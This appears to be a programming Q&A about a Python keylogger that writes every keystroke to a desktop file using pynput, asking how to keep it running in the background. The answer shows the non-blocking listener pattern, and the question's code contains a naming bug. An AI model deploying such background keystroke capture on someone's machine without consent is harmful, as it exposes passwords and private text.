# Keylogger stuck in loop

Tags: python, keylogger

can you help? I tried making a Keylogger. I would like the keylogger to run in the background and allow the rest of the program to continue.The keylogger gets stuck in a loop, and doesn't execute the code after it.
I'd like the program to print Hello World, while keylogger is still running.
Code for reference below:

```
username = os.getlogin()

logging_directory = f"C:/Users/{username}/desktop"

logging.basicConfig(filename=f" {logging_directory}/keylogger.txt", level=logging.DEBUG, format="%(asctime)s: %(message)s")


def key_handler(key):
    logging.info(key)


with Listener(on_press=key_handler) as Listener:
    listener.join()

print('Hello World!')
```

i am using 3 imports: os,logging and Listener.

Answer (score -1):

https://pynput.readthedocs.io/en/latest/keyboard.html

```
# ...or, in a non-blocking fashion:
listener = keyboard.Listener(
    on_press=on_press,
    on_release=on_release)
listener.start()
```